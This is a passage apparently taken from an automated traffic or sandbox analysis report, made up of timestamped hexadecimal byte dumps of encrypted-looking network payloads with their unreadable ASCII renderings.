10
                                                                                                                          Data Ascii: ?sq]q>9LI;&-}i?A*{SZc@/UC<GI5<fv:Mo'CWY;3V\^:-I@ZV#T*S>j}.:XiFB+3HIxh<i,2iR8+c\I % n.E*<zW
                                                                                                                          2022-06-14 11:50:17 UTC175INData Raw: 36 fe a2 f3 7e 11 16 05 e3 95 22 77 16 83 51 0e 1a 18 28 80 ac 82 6f 93 62 70 df 6f ec 78 cd a0 0f 7f f7 d6 d9 ef 81 81 90 f4 3b 84 dc 85 64 c2 ca 4c d5 4c b4 dd bd ac 91 94 3e 56 5a a5 68 f6 d9 08 df 65 a1 69 c4 e7 8b a1 99 d9 e7 02 b7 30 3b 3a 40 2a 2e 1f 02 4c 75 11 a3 dd 4e db db 87 4e 95 57 72 c4 af db 91 27 05 bc 1e 62 66 91 0e 89 63 65 49 04 92 fa 1d 1a 6b 7f ed 0e 6e 22 dc 91 44 3c d9 9a da 49 fb 4b 1b c6 7d a9 c4 64 60 66 78 79 42 d8 d4 3f 9c fa fb 8b 93 dd 80 53 b6 ec 9f 95 78 a6 5d 85 fe 59 fa 98 1f 9e 68 d9 f0 f9 8f 66 57 68 c6 aa 77 4d e7 7b 2c 91 78 2b 2b bd de f9 1a 1e 3b 53 1f b1 3a 97 12 b2 f3 eb 7e 2f 3a c0 d9 0f e3 0d db 2a 88 24 26 d8 c5 83 25 5e 60 7f 01 5e 2e b0 4b 7c f9 8a bd 24 5d 82 1f 29 3f 45 8e 0a 1d 45 b3 9c 04 36 d1 16 ab dd
                                                                                                                          Data Ascii: 6~"wQ(obpox;dLL>VZhei0;:@*.LuNNWr'bfceIkn"D<IK}d`fxyB?Sx]YhfWhwM{,x++;S:~/:*$&%^`^.K|$])?EE6
                                                                                                                          2022-06-14 11:50:17 UTC177INData Raw: 33 40 3e 3c c6 74 1b 33 c2 fc 4e 3a fc 9c 1e 3e a5 fe 02 73 ea 8a 41 f0 b4 ab 3c ad 5a 30 c3 66 50 76 a5 5f b3 f3 fb 45 8d b7 15 5e 33 2f 93 b3 9f 2d b2 5b 14 c7 9d 68 9a 85 77 eb b0 24 fe 18 a5 c4 4a 01 d1 52 d8 28 bd b4 b3 aa 91 9c 07 4f b4 04 b4 54 dc 12 5f 16 b2 be 87 da 7d 0e d2 7b c9 e3 57 9a fb 91 7e b6 4a 9b 45 21 a0 40 68 1d 0b 32 ef 32 27 fb 1b 86 4b 4d 89 1e 4c 06 c1 fb 86 74 8b 2f 13 80 8f e7 41 8e eb a4 e6 95 56 eb 15 f0 79 23 f2 a2 ae a0 88 53 b8 60 aa f5 78 68 23 82 29 5e 18 0a aa 93 25 68 ae e7 bd c4 e7 2e d8 ac cd d5 96 5f c1 14 9e 7d a0 f9 cf 97 3c 54 a3 9b 9e 27 c8 78 a0 20 1e cf 8c 09 4f e6 cd 57 e2 b8 78 bd b1 5b df f8 3d 81 c9 d1 a7 8b f7 02 6e 08 4a 58 db 6c ec 7b 0b 69 76 f2 22 3a 50 34 c3 32 d5 c3 7d 6f 02 7e 58 84 7f d0 22 c6 63
                                                                                                                          Data Ascii: 3@><t3N:>sA<Z0fPv_E^3/-[hw$JR(OT_}{W~JE!@h22'KMLt/AVy#S`xh#)^%h._}<T'x OWx[=nJXl{iv":P42}o~X"c
                                                                                                                          2022-06-14 11:50:17 UTC178INData Raw: b9 83 1d 08 68 5c 65 cc 22 37 62 2d a4 a8 13 56 e5 ed 2c 0f fb 1e 9d eb eb 92 78 1c bd 48 1d 27 3a 38 87 87 f2 b9 4b a7 58 c2 71 14 e1 9b db e0 08 11 c3 8e f0 2a 47 5c aa 64 03 c8 2e 69 de 49 d6 d8 88 ea 3f 80 f4 32 3d d3 8e 61 93 70 d4 cb 31 d9 b3 14 a6 c1 d4 07 d2 af 8f e0 6f a5 3b bb 1d 91 35 57 73 fa 4d b3 b7 6d ec 8b 59 a5 ec c1 85 d4 f0 7d cf f2 38 e7 82 f1 c8 a3 00 8c d4 23 63 6d b9 bd 09 6f d4 da 3d 42 05 ae 9c 49 12 fd e6 cf 04 22 c3 53 dd 64 fe 19 54 1c bf 67 71 0f 9a 68 e5 6e 9c 5c cf 39 fb d3 ee d2 be 4e d4 ed 72 52 13 10 e7 f1 92 d0 ff bd 18 83 e4 48 fd a3 8e 61 82 fb cd 41 48 75 1b 9f 01 4e 9a 44 53 41 62 40 b6 1f dd b7 07 d8 e5 c6 96 05 4e 7f 3d 47 19 35 14 52 64 07 f4 c9 e2 9c 23 99 12 3a 5a 9f aa 18 13 aa a1 a7 77 b7 ff 34 6e b4 cc 27 28
                                                                                                                          Data Ascii: h\e"7b-V,xH':8KXq*G\d.iI?2=ap1o;5WsMmY}8#cmo=BI"SdTgqhn\9NrRHaAHuNDSAb@N=G5Rd#:Zw4n'(
                                                                                                                          2022-06-14 11:50:17 UTC179INData Raw: 6a 38 e7 dc 58 d2 08 a3 99 bb bb 94 f9 e6 16 08 7d 0c 6d fa 0c 69 61 34 f5 9c e0 ef 7a 36 20 9f 4b b9 40 34 d3 79 39 e0 51 5f bf 27 5b 09 6c 08 52 9c e4 7d e5 f5 09 46 0a dc 58 6a e8 d9 64 77 5c 8d 9c 20 16 78 36 55 32 d5 56 48 95 57 4b 41 eb 7d 9e 0a c4 f5 3a 0d 79 f8 4e 2a cd 49 b8 63 11 37 2b 9b bf 12 9a 15 6c 95 54 67 82 9a 30 61 67 c9 71 13 06 fc e9 59 62 9f f4 2b c4 f0 6f 11 d5 b7 c9 de 95 3c dc 11 9e 01 98 0f 34 cd 81 4b 25 10 f1 d9 2a ce 9a 0c c0 36 51 2d f1 f6 12 23 91 b3 f9 c3 7d 16 d3 51 de 95 1a 89 95 99 16 3f b2 4f 05 df 3f ec 8a 42 a2 bd 7c c2 42 89 79 a3 f4 90 a4 3b 97 50 87 a9 d4 ff d8 85 04 d7 a8 bd fc 91 a1 b2 54 86 a6 5d 62 89 c6 b0 10 a1 39 c4 b0 07 a3 f7 c1 d2 96 e7 2a 9b 4f 40 7a 2e 66 8e 4e 73 15 96 49 1e 2e 70 f2 4e c5 57 e8 48 ad
                                                                                                                          Data Ascii: j8X}mia4z6 K@4y9Q_'[lR}FXjdw\ x6U2VHWKA}:yN*Ic7+lTg0agqYb+o<4K%*6Q-#}Q?O?B|By;PT]b9*O@z.fNsI.pNWH
                                                                                                                          2022-06-14 11:50:17 UTC180INData Raw: d3 fd 42 8b c7 80 d8 dd 48 11 c6 d4 f3 04 d0 6e 05 2d 2f a9 7d 31 b9 8c 99 b1 f9 5b 41 d8 e2 2e 28 55 7b 68 5e 51 58 56 42 20 1f af 27 32 8b 95 f3 86 1e 4c 45 09 45 8f 35 c4 c5 51 e3 a0 fc d4 87 21 c5 26 38 cc 9f 7f 88 26 0a d2 92 20 ac fd 4a 5a b6 5a 27 0c e8 a0 55 87 14 b8 a3 df a5 c3 39 0f f6 40 3a 9c 54 9b e0 a3 17 ef 01 32 5c c7 d2 cf fc 1a 4b 10 a4 32 b2 7f 9a 6f e1 0b 9d d7 50 84 a4 73 c2 1f 83 6a 41 0b 68 2e b8 0c ad 19 38 08 1b 00 c7 1d cc ba d9 80 42 b2 36 f3 e0 4b 48 ff 85 4e 6a fc 93 ae 3c 0a fc 37 e7 ba 02 04 89 b4 fb 3c 9c ea 32 47 74 65 e2 f5 f4 cd 8a fb 15 8d e4 a5 5c ea 2d a6 27 cf 9f 33 22 14 97 9d 1d 2a 87 c3 f9 85 b0 ae e7 1f bd 4a 51 d1 c5 68 2a be b7 86 3e c1 7f ca 36 b4 54 b4 ed 6c 10 a6 05 87 2a d7 5b b7 77 d2 2b c9 38 e7 98 cc 92
                                                                                                                          Data Ascii: BHn-/}1[A.(U{h^QXVB '2LEE5Q!&8& JZZ'U9@:T2\K2oPsjAh.8B6KHNj<7<2Gte\-'3"*JQh*>6Tl*[w+8
                                                                                                                          2022-06-14 11:50:17 UTC182INData Raw: 25 2f 2a d0 ac cf 39 b0 49 45 dd a9 ec a1 d1 97 0d 2f f7 bd 8f 7b 84 b4 92 32 3b 46 ec b2 66 92 ca c4 82 06 9f e8 bf 6a 91 f4 21 61 58 f5 68 20 8e c4 da 50 a3 af c4 a8 ba 96 9b 89 e7 f6 e0 28 17 0f 42 ec 2e eb 1d 7b 77 41 a3 cf 19 2c de b2 4c 54 4f 06 fe 2b db c1 27 93 bc 8c 4e 04 8e 4e 99 dd 7f 4b 04 82 ea 88 1a 5f 79 c8 1c 3a 22 02 8b 56 2c d8 9a 4c 49 71 75 2f c4 2d a9 d4 6f 63 66 78 79 d4 d8 8a 3e 1f e0 bb 9b b0 c6 82 53 a6 fc 0b 95 29 a0 78 97 ad 59 b9 83 0d 8e 6b d9 66 f9 30 77 66 6a 96 aa 03 46 e0 7b 2c 91 fe 3b 9a bb eb fb 5a 0e b9 48 1d b1 38 97 86 b2 f0 e9 48 0d 68 c0 71 14 e1 2d df 2a 1e 24 c3 de f3 81 75 5e ab 44 07 5e 2e b0 df 5c d0 88 88 26 0d a2 f5 32 3d 45 8e 2a 89 45 d6 9b 31 14 82 16 a6 c1 d4 b1 d4 ac 8b d5 6d d5 3a b5 2e 93 35 77 71 6c
                                                                                                                          Data Ascii: %/*9IE/{2;Ffj!aXh P(B.{wA,LTO+'NNK_y:"V,LIqu/-ocfxy>S)xYkf0wfjF{,;ZH8Hhq-*$u^D^.\&2=E*E1m:.5wql
                                                                                                                          2022-06-14 11:50:17 UTC183INData Raw: a5 27 03 fc fe 11 45 2c b7 6a 32 8f 7c 2b c1 3c 58 bf a1 ed ac b4 e5 1f 88 fd 31 cd 3d 3c 93 14 9d 77 96 7d 16 be 9f f5 9c a1 77 da b2 40 d7 27 b8 c0 4a 3e c6 3b ff 1b bf 84 97 c2 90 4e 01 73 92 6d b1 dc f8 9d 76 f3 b6 11 85 b3 7c fb d0 6a cb d0 51 d8 fe d0 7c ab 6d 56 40 55 a0 5b 7f 1e 2c 61 ed da 07 7e 1b 68 6e d0 86 8e 4c 49 e4 33 8d b4 8b f0 11 5f aa 98 46 97 e9 0a db c3 53 8a 17 86 72 3e d8 d6 ae b3 ae 6b 9a 3e aa 4b 7f a7 27 ac 2e fd 36 9a aa 5e 00 82 8e 8e b8 63 e5 db fb eb ca ec 94 6e e8 05 9e 04 a2 66 eb d0 3d 18 a3 ed 97 20 ef fb a2 e2 39 c2 89 43 65 13 dc ab e7 28 5d 31 a5 b1 db 17 3f b9 db 0b a1 5a f5 ea 50 bb 4f d9 d9 d0 c0 a5 22 85 75 35 2c 05 78 af c1 da f5 46 7d 96 06 fd 57 26 7a 1f 0b 26 40 14 fd c3 cf c0 69 03 77 26 60 0a 34 da 0e 0e 24
                                                                                                                          Data Ascii: 'E,j2|+<X1=<w}w@'J>;Nsmv|jQ|mV@U[,a~hnLI3_FSr>k>K'.6^cnf= 9Ce(]1?ZPO"u5,xF}W&z&@iw&`4$
                                                                                                                          2022-06-14 11:50:17 UTC184INData Raw: e7 e9 01 19 e2 f2 9b 07 fe 77 46 8f bc b3 17 2c 38 be 85 92 f9 78 47 2c 6b 4c 62 83 ed 71 db c2 3e 37 c1 9f f5 a6 67 25 a8 c5 02 ae 3c 65 d1 a5 d5 1d 9d 79 09 cb f1 da 1d 85 8e 5b 8e ad f6 88 31 6d 80 cf aa f6 d9 48 d3 78 91 fb 6b 89 3b 0b 29 ca 31 66 72 8e 50 e8 a3 99 ee bd 4b f3 d2 12 87 58 e3 a2 ce 04 3c 69 91 ff c1 32 33 3a c0 5d 6e b2 b8 f1 37 dc db bb 3c 3f 3a 86 9e 00 13 c3 c4 28 0d 6b c1 1a f4 d9 cc 67 54 2c a7 f0 7d 50 83 f3 e7 85 91 c9 f8 1a fa 11 e3 75 bf 52 dc f2 72 5b 12 3d d8 13 9f 89 fe c1 14 cd f4 24 fe ee 83 79 bc 20 cc b7 46 bc 1f f3 04 e7 8d 11 5d 31 53 aa 96 12 d3 08 06 d9 dc eb 9a 64 4f ba 02 70 1b 49 14 14 44 de f4 78 e0 3c 0b 55 26 44 5a 0e 8e c1 1d 8c 82 cd 5f b8 fb 13 5b 00 dd da 2b cb 91 c6 f4 94 c1 c9 d9 34 e0 bf 97 2f 49 5a bd
                                                                                                                          Data Ascii: wF,8xG,kLbq>7g%<ey[1mHxk;)1frPKX<i23:]n7<?:(kgT,}PuRr[=$y F]1SdOpIDx<U&DZ_[+4/IZ
                                                                                                                          2022-06-14 11:50:17 UTC186INData Raw: 5d 4a 6b f6 0a f8 61 8f ca a7 e4 07 5a 45 24 77 59 3a 4a 33 cf 46 01 90 40 01 a3 10 5d 37 4e 2e 50 0d e4 1e ca 93 00 0f 0b ab 7a 48 e6 a8 66 a1 56 f4 b3 63 17 d7 1a ab 2f 94 54 77 b4 68 56 1b d5 0d 8f 62 c3 a2 38 41 47 5d 51 cb cb 06 96 f7 0c e6 28 e7 ac fe 84 21 6f 3e 5e 0e a3 74 30 89 47 4c 71 11 12 ba cd eb 7b e3 cb f9 e4 06 76 83 d4 19 e2 7b 97 98 dc 83 b9 e9 8c e3 34 e5 86 4d 26 21 f2 d6 00 52 a1 57 c1 2f 72 3d fc 92 11 65 b5 01 e0 2b 43 c4 f3 a7 c7 17 1b d8 a8 3c 14 83 b2 79 5d 37 2b f8 8b 8b 88 50 7b 1b 40 43 5a 00 aa 8e a5 eb b7 5c 99 40 c3 3a f2 65 1a bb e9 e0 d6 ce a5 f5 57 28 a8 42 62 08 c5 7a 72 49 27 2d b3 88 8a b7 d8 06 90 38 23 0c 10 53 7e fe 46 20 48 94 15 8b 6a 69 31 3f b6 a3 dd 35 ea 3f a9 40 99 17 8c 65 89 f2 46 a4 40 68 db 25 6b 33 8d
                                                                                                                          Data Ascii: ]JkaZE$wY:J3F@]7N.PzHfVc/TwhVb8AG]Q(!o>^t0GLq{v{4M&!RW/r=e+C<y]7+P{@CZ\@:eW(BbzrI'-8#S~F Hji1?5?@eF@h%k3
                                                                                                                          2022-06-14 11:50:17 UTC187INData Raw: 33 11 2d ed 7c cc f9 8c 99 a4 f8 87 50 41 e3 03 2b 3d 71 96 14 4a 59 fc 58 b1 1f 81 20 68 86 c2 f3 f4 54 3c 4a 00 45 81 34 97 c1 6d e1 6c fd 9a c3 2a c5 86 39 25 90 a2 8e e7 09 01 97 7d e7 07 4b 1f b6 c4 27 d4 eb 58 47 df 14 cb ea 0a b5 cb 39 91 f4 cb 38 a1 56 c7 e2 7f 5c e5 01 22 5e 9c c2 9c fe 3b 4b 9c b4 81 f9 65 98 10 ee 95 9d 53 5a 50 b6 2b c2 e2 ca 8e 51 03 68 9c ba 62 bf 24 3a 70 19 85 83 17 cc 96 db e6 52 36 3c f6 e0 ee 58 d7 c9 78 68 06 83 30 3c 9d fc fd f5 e2 02 79 c7 2b f2 34 9c 38 30 40 63 58 e0 ed f6 eb c6 f1 15 c1 e6 fe 4c 3b 2f c3 27 43 8f be 6e 42 95 e2 12 b4 87 2f e9 51 a2 f6 e7 e4 f3 41 40 d9 c5 9e 28 b3 a5 b6 3c 81 7c 49 6b b3 54 a0 ee b6 01 57 16 ca 2b c2 5b 54 3b ac 28 15 28 79 98 7b 92 01 2f 42 96 c8 17 21 15 60 e0 a1 33 aa 32 2f 6d
                                                                                                                          Data Ascii: 3-|PA+=qJYX hT<JE4ml*9%}K'XG98V\"^;KeSZP+Qhb$:pR6<Xxh0<y+480@cXL;/'CnB/QA@(<|IkTW+[T;((y{/B!`32/m
                                                                                                                          2022-06-14 11:50:17 UTC188INData Raw: 1a 26 e2 dd cc d4 91 01 87 78 2e dc d0 ee 72 5a dc 7a c3 ae 89 23 a9 0a 87 a6 33 4b 4d 94 7f 2f ce b8 cd c7 b4 8b d3 45 86 aa 81 f5 ff a6 af bc 0f c5 5a 96 36 6e 01 54 6c 21 ba 75 57 99 c7 75 55 cf 4d fa c4 80 c1 af 3d cb a6 e5 54 e4 89 88 93 2d 65 bd 1e 86 e1 3c 01 90 62 3e 17 5d 3e 82 97 db 20 15 86 b5 55 4d 78 5a d9 8e b4 1b 62 d7 78 8a 67 9e c7 0d 21 1f e7 72 94 b6 e6 be 73 d7 cc 84 b5 b4 80 a5 a7 b6 78 81 a2 7c bf fe f8 dc d8 fb 46 66 48 a8 88 5b 74 9c 59 8d b3 07 09 d9 98 4d d8 9a 3d bc 6c 7e 95 b0 b3 1b 96 3c cd b2 09 56 e5 13 31 66 28 1c 0f c8 01 c1 f8 e4 a7 48 78 f6 42 79 78 ad 96 7d 5a 79 ae 30 00 b0 a4 25 14 58 62 f8 2d 0a 62 47 bc ad 13 25 31 6c e6 01 b6 2b 8b 88 fd 78 dd 0f 9d 74 bb 59 7f ef 44 ee b6 69 70 37 f3 42 a3 fd ea be fd b9 c2 51 ec
                                                                                                                          Data Ascii: &x.rZz#3KM/EZ6nTl!uWuUM=T-e<b>]> UMxZbxg!rsx|FfH[tYM=l~<V1f(HxByx}Zy0%Xb-bG%1l+xtYDip7BQ
                                                                                                                          2022-06-14 11:50:17 UTC189INData Raw: 50 a4 a4 1f ad 7a d2 1f 8d 0c 64 5e 33 70 92 21 1f 9f b6 6e 16 97 9d 1d bc 87 77 eb b0 b2 fe e7 b8 18 62 51 d1 c1 fe 2a bd b4 b3 3c 91 7f 03 7a b6 55 b4 35 fc 10 5f 16 b2 22 87 5b 5c 3b d0 2b c9 38 71 98 fb 9b 7e 06 4d 96 40 14 a2 14 68 e0 2d 30 ef 32 27 6d 1b 39 6c 79 8b 36 68 18 e6 f9 86 70 8b b9 13 b7 8a d2 43 de eb e4 c1 96 56 8c 0d 66 79 fe d8 93 ac f0 88 31 9f 62 aa f5 78 fe 23 e7 2c c2 09 5a aa 17 02 6e ae e7 bd 52 e7 0a f3 99 cf 85 96 f3 e6 8d b6 7d a0 6f cf 0a 39 61 a1 cb 9e e0 ef 7a a0 20 1e 53 8c b4 49 d3 cf 07 e2 55 5f bf b1 5b df 6e 3d 50 cc e4 a5 da f7 49 51 0a 4a 58 db ff ec 62 27 5a 74 a6 22 1f 78 3e c3 38 d5 5d 7d 9c 07 43 5a d8 7f 96 0a c9 63 32 fb 64 cd 44 7a dd 74 88 61 00 37 3b 0d ad 26 89 20 7d c5 44 39 a9 98 20 61 72 5f 61 e5 05 c9
                                                                                                                          Data Ascii: Pzd^3p!nwbQ*<zU5_"[\;+8q~M@h-02'm9ly6hpCVfy1bx#,ZnR}o9az SIU_[n=PIQJXb'Zt"x>8]}CZc2dDzta7;& }D9 ar_a
                                                                                                                          2022-06-14 11:50:17 UTC191INData Raw: 7c 97 c1 f4 f0 af 0d 2d 2d 86 71 5c a7 0d ba 6c 1e 46 87 de 93 c7 75 3a ec 64 66 18 2e d6 9b 7c b3 ce 88 64 4a 82 b7 75 3d 01 c9 0a ce 02 d6 dd 76 34 c6 51 a6 89 93 91 b3 eb 8b b7 2a f5 58 f2 2e f7 72 57 16 2b 4d f8 e9 58 89 9c 59 c8 97 c3 c6 9c f0 af 87 c5 79 9a 80 e7 80 f3 74 c6 d4 6b 2b fb d8 58 15 38 9e 8a 5e 78 36 c8 d4 49 77 23 e6 c8 48 17 a6 4b dd b5 84 1b 17 55 bf b5 38 71 c2 14 e7 78 d5 e8 bb 72 fb 9b a7 44 d9 a0 a4 87 31 51 50 8f 9d f3 f3 99 ff 49 51 2d 9a 34 ff 97 c7 99 d4 b0 cd 27 01 e3 7c 63 05 39 d2 14 10 12 56 06 fc 1f 98 6b 07 cf 8f f3 d3 1f 4e 0d 43 45 78 7f 14 a6 2e e1 93 b6 e0 a8 69 c5 43 72 5a f9 e0 8e 74 42 82 d0 3e e7 bc 01 5a f2 87 27 6d a1 95 11 9c 14 88 a3 dd ed 88 39 f8 bd 48 5f e2 56 a8 ab 3a 38 a6 01 57 17 51 b4 df fe 48 02 40
                                                                                                                          Data Ascii: |--q\lFu:df.|dJu=v4Q*X.rW+MXYytk+X8^x6Iw#HKU8qxrD1QPIQ-4'|c9VkNCEx.iCrZtB>Z'm9H_V:8WQH@
                                                                                                                          2022-06-14 11:50:17 UTC192INData Raw: 0b e9 23 00 d3 9b 6f 90 34 3e db b1 17 b0 0f 59 50 ae 80 a5 b8 93 09 07 6e 2e 58 88 b2 ad 57 6a 3d 1a c3 45 73 1c 36 91 5b bf 3b 19 f6 62 27 17 b5 11 ff 6d a1 07 3a 9c 0f b9 13 36 ac 07 f3 2c 7e 53 42 6b d6 43 fd 20 1d a0 20 66 f1 f9 43 15 2a 30 15 8c 74 a0 8e 6d 62 6c ae 5d 9b b5 01 e6 b7 85 af 8f 97 0b b9 c7 fe 41 e1 7b 51 28 d5 0a 51 4b 80 ef 4f 7f d7 6b a4 36 30 df 95 21 54 7a f2 93 8a 42 26 14 9a 22 9c 7a 6a 49 f3 df 71 0b b2 2e 20 a9 60 a0 eb a7 d6 4e 1c 94 25 aa 0a e1 d0 92 d7 5e e3 99 cb 05 b1 be 9b b6 67 fa 9b cc 99 f5 a1 43 31 2e fa 2b 0f b7 a8 bf 33 d7 5c a0 b0 f0 c7 fd 86 a4 fb da 5a 7b 6a 36 1f 4a 66 4b 37 06 65 c6 26 60 6d b1 de 20 a0 34 9c b7 c2 b5 e2 09 c0 cc e8 2d 3a f2 32 e0 a5 1a 2f 04 f4 9e 8b 7d 3b 79 95 65 5a 22 65 ee 32 63 90 e9 05
                                                                                                                          Data Ascii: #o4>YPn.XWj=Es6[;b'm:6,~SBkC fC*0tmbl]A{Q(QKOk60!TzB&"zjIq. `N%^gC1.+3\Z{j6JfK7e&`m 4-:2/};yeZ"e2c
                                                                                                                          2022-06-14 11:50:17 UTC193INData Raw: 4f 51 12 f5 71 53 0c 39 04 df 73 b8 75 6e e4 a0 f3 d0 34 3a 20 5d 2c 74 50 14 83 01 95 bc 9d 93 b8 74 b7 4f 4c 3f cb c3 e3 76 08 d1 f7 01 ab 9e 39 2e e1 be 4e 5c 8f c1 3e ba 71 cf bb b8 d1 80 4b fc 97 3c 54 c6 38 9f 89 57 39 ed 46 57 28 1d b3 e7 8a 6e 2a 23 c1 fa 8a 29 f3 02 84 9d ce 2a 2c fd c7 50 b6 83 ab 0b 24 78 1b ec d1 e4 ca 2c 75 36 7e ff de 7a ad de 95 7f 2c 5b 3c 87 92 6b 2d b1 ad 00 03 92 f6 38 6b d7 97 76 80 a6 6b 2b a0 b6 9c 59 e8 23 7c a6 11 1c 89 cb 91 ae 85 96 78 ef 8d 5d 39 33 63 fc
                                                                                                                          Data Ascii: OQqS9sun4: ],tPtOL?v9.N\>qK<T8W9FW(n*#)*,P$x,u6~z,[<k-8kvk+Y#|x]93c
                                                                                                                          2022-06-14 11:50:17 UTC193INData Raw: 46 fe f3 fb 0f 75 ff f4 73 d9 87 32 98 d3 d3 8e 82 b8 a4 26 34 a2 a6 9f 5a d8 b4 f7 5d e5 1e 53 08 d9 20 d1 8e 8e 79 30 78 e1 4b e8 2b 39 3b b7 4e bd 67 25 e1 8b f4 7e 53 2f e2 1f 40 db 60 0d e0 5e 55 9b 6d 6a 08 7f 50 0d 2c f2 3e 29 18 a5 91 e7 1a ec dc 47 ce fa b7 43 88 8a 88 b4 f2 02 92 65 03 79 ad ac e5 c5 9e ef 65 e6 12 cf f5 2b 9b 40 98 5e 02 6e 23 fa 65 6d 1e c1 84 d2 3e b3 73 83 fc cf c2 f3 8d b2 6f ee 18 a0 3c a0 6d 52 04 d5 9f e7 90 8a 7a d3 45 6a 06 cf 2d 0a a7 aa 69 96 05 26 cf d4 5b 99 07 51 35 9f 8c c4 a9 92 09 05 65 27 28 ba 88 89 66 77 28 06 f6 4d 45 0c 44 b6 51 a1 20 0f f2 07 2c 3f a0 20 d7 64 b2 02 48 92 0b a3 38 39 b8 18 f3 14 63 52 2b 4e de 56 ed 55 1c a0 54 78 cd e8 5c 08 04 3e 05 8c 7d a7 a9 68 11 7a cb 67 a5 9d 0a c8 b7 83 af 88 e3
                                                                                                                          Data Ascii: Fus2&4Z]S y0xK+9;Ng%~S/@`^UmjP,>)GCeye+@^n#em>so<mRzEj-i&[Q5e'(fw(MEDQ ,? dH89cR+NVUTx\>}hzg
                                                                                                                          2022-06-14 11:50:17 UTC195INData Raw: 4c 1e 42 a7 de 97 e7 75 1c cd 64 40 39 2e f4 ba 7c 91 ef 88 60 6a 82 b3 55 3d 0d e9 0a ea 22 d6 f9 56 34 e2 71 a6 a5 b3 91 b5 c9 ff 8a 27 85 5e d2 2e f5 52 57 14 0b 4d cd d7 2b 9a be 34 a4 8b ab f7 b1 91 8f a6 ab 5b d2 f3 c4 bc ac 63 ef b0 47 0a 95 de 10 5b 3f a1 c6 5c 44 53 ee f5 27 76 02 88 c9 00 42 95 45 e5 b2 a3 78 3b 78 d6 9f 16 71 c0 38 93 7b f2 8b 93 5f 92 bd 89 44 ed bc a3 ac 15 6f 3d 82 a6 92 e5 b9 91 4c 36 64 94 1c 98 9a e0 fe b1 bf bf 2e 25 a1 7a 59 60 4d ac 47 27 2a 3f 2c d1 1f 89 4e 45 e8 b6 96 a2 61 1d 31 7b 2c 77 52 14 81 17 82 91 8c 85 88 42 b1 47 6b 2e ed c3 e0 74 08 d7 fc 10 94 9c 2b 2a d3 88 46 5c 8b c6 23 a5 7d a1 8f dd e1 ac 4e f7 9a 27 5c cd 05 bf 92 53 32 8a 01 75 39 25 82 e6 97 59 28 34 c1 d9 8b 12 fc 06 8d f8 ce 3b 2a d8 c8 44 c2
                                                                                                                          Data Ascii: LBud@9.|`jU="V4q'^.RWM+4[cG[?\DS'vBEx;xq8{_Do=L6d.%zY`MG'*?,NEa1{,wRBGk.t+*F\#}N'\S2u9%Y(4;*D
                                                                                                                          2022-06-14 11:50:17 UTC196INData Raw: 49 22 a9 85 c8 db 90 6c 32 55 08 39 a8 9f bf 12 55 39 15 cf 22 51 1d 42 91 57 a6 25 12 f9 74 2e 09 a0 0d fb 6b a9 63 7e 9e 0c a1 2d 0e a8 27 f3 13 74 56 46 0d d8 43 ed 7f 2b ab 30 76 db cb 44 13 02 3e 1c e5 51 bb 92 79 16 70 98 5d b6 95 0e ea d5 ae af 9f c5 09 ad c6 c4 70 ec 5c 40 29 e4 19 5d 25 be ec 47 62 d7 77 93 42 23 de 90 13 11 71 f6 97 a6 6b 12 75 a1 30 b3 03 7d 4d f4 f3 43 3f d3 3b 24 b0 3f 8b ef a0 fd 5f 1e 85 21 b4 79 e6 d9 92 c7 56 97 a2 ea 64 a5 af ae 8a 4d eb 8d d2 fc e2 c4 50 0b 13 d1 0d 0d d9 90 bb 25 cf 4d 83 d5 e5 ea ed bc 8a 94 d0 4f 63 50 04 13 42 03 4b 37 06 65 c6 26 4e 61 ae d7 3e a4 23 81 b0 ca 88 e8 54 e7 d9 e0 4e 35 fe 5e ee b2 7f 18 7d ff 97 ee 6e 2d 10 bb 4d 52 45 6d f9 2f 48 b1 f7 4c 01 00 16 46 85 41 ce ab 0d 0b 12 10 14 d4 94
                                                                                                                          Data Ascii: I"l2U9U9"QBW%t.kc~-'tVFC+0vD>Qyp]p\@)]%GbwB#qku0}MC?;$?_!yVdMP%MOcPBK7e&Na>#TN5^}n-MREm/HLFA
                                                                                                                          2022-06-14 11:50:17 UTC197INData Raw: c5 94 f1 21 11 0c 67 23 76 35 5d a9 05 86 95 bf 8f a8 46 a6 6f 56 3c f0 aa c8 7a 6d ee f6 3c 89 99 25 5a f0 a5 4b 4d a3 fb 31 b8 14 8c 9d b1 d1 b6 4b fc bf 26 5b c6 56 8d 89 56 39 bb 64 40 2f 38 bd fa b7 41 2f 2f a4 ce 9c 09 cc 0a 93 ee f4 20 36 f8 c8 45 ad c2 8b 07 2c 7b 1d cc dd fb e6 42 5c 37 1b 98 e9 6b 93 e9 ad 77 30 4a 75 a8 84 74 48 8f bb 23 09 99 e0 4b 6f d1 9f 70 91 a3 6c 23 aa b6 bc 59 e8 30 53 b0 12 19 8e d5 81 da 8f 97 73 e2 e4 77 35 41 4a f0 51 f0 ed cf 27 78 f1 f2 1d db e8 77 b1 d5 c0 91 e7 fa 81 48 12 a1 c5 ba 5a bd f1 c3 3c d7 0f 03 3d c6 54 fc 9d fa 52 36 62 df 49 f7 5b 3e 4b d0 48 b9 38 15 e8 fb f4 0e 20 2c e6 40 73 d2 10 2f 92 42 45 9f 32 65 1c 1b 7a 1d 78 cf 3f 4c 5d 97 f9 c0 05 8b fe 62 b7 c2 a3 43 bf 9a e4 a3 e6 56 88 64 66 1d 8f d8
                                                                                                                          Data Ascii: !g#v5]FoV<zm<%ZKM1K&[VV9d@/8A// 6E,{B\7kw0JutH#Kopl#Y0Ssw5AJQ'xwHZ<=TR6bI[>KH8 ,@s/BE2ezx?L]bCVdf
                                                                                                                          2022-06-14 11:50:17 UTC198INData Raw: 4e 98 b6 aa 3c ca 5a a5 c4 f8 cc f7 8a 82 e6 c1 43 74 6a 31 7a 7d 1f 6b 3a 10 7c 8d 19 3b 40 aa db 21 a0 79 ad a6 ce be e1 53 fa d3 e3 1d 36 e1 28 e0 bc 1a 38 04 c1 83 f8 6e 3a 14 f6 5e 4b 4c 76 e2 2b 59 f7 d3 22 3d 04 17 41 b4 7e cc b6 09 0b 05 1d 0a d4 95 e2 5d db 97 d8 e4 d4 b2 ac 05 df 9f 7c f4 45 e2 09 f4 c7 3a 97 c0 72 f3 18 b0 0a 9c 52 34 07 18 e0 c3 70 33 96 7b 7f e8 9d 5f fa d6 c5 a9 3f 70 c9 21 70 d4 14 d4 eb df 80 80 27 48 18 93 14 66 97 64 b8 4f 6d 24 8c b7 93 f3 1a 2d c5 02 77 70 78 d9 ae 09 b5 e4 ca 47 7e eb 97 1c 70 3c dd 6f f9 33 bf f8 54 47 81 51 c3 b5 9d ff a1 d8 ea bb 0e 90 48 b5 49 f6 41 08 30 04 24 f2 ca 16 81 bf 3c 